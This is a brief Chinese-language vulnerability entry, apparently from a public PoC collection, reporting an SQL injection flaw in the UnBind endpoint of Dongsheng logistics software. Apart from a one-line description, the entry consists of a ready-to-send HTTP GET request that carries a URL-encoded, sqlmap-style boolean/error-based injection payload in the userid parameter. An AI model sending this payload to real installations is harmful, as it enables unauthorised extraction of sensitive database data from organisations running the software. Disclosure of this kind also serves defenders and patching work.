东胜物流软件 UnBind 存在SQL注入漏洞

日期: 2025-11-05 | 影响软件: 东胜物流软件 | POC: 已公开

漏洞描述

东胜物流软件 UnBind 存在SQL注入漏洞,攻击者可获取数据库敏感数据,造成信息泄露

PoC代码

GET
/Mobile/Login/UnBind?userid=-2963%27+OR+1636+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28120%29%2BCHAR%28113%29%
2BCHAR%2898%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%281636%3D1636%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%
29+END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28113%29%29%29--+oTEn
HTTP/1.1

相关漏洞推荐